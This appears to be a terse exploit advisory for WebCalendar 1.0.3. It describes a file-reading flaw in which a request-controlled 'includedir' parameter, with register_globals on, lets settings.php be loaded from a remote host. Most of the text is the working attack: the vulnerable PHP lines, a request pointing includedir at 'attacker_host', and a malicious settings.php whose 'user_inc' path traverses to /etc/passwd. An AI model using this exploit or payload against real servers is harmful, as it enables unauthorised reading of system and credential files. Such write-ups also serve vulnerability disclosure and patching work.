Version: WebCalendar-1.0.3
Type: Reading of any files
includes/config.php:
line 64
if ( ! empty ( $includedir ) )
$fd = @fopen ( "$includedir/settings.php", "rb", true );
…
while ( ! feof ( $fd ) ) {
$data .= fgets ( $fd, 4096 );
}
$configLines = explode ( "\n", $data );
for ( $n = 0; $n < count ( $configLines ); $n++ ) {
…
$settings[$matches[1]] = $matches[2];
…
$user_inc = $settings['user_inc'];
…
includes/init.php
include_once "includes/$user_inc";
index.php?includedir=http://attacker_host
where in attacker_host exists file settings.php , which content
"
<?php
echo '<?php
Unimportant variables can be taken from original settings.php
user_inc: …/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
?>';
?>
"
Requirements
register_globals = On;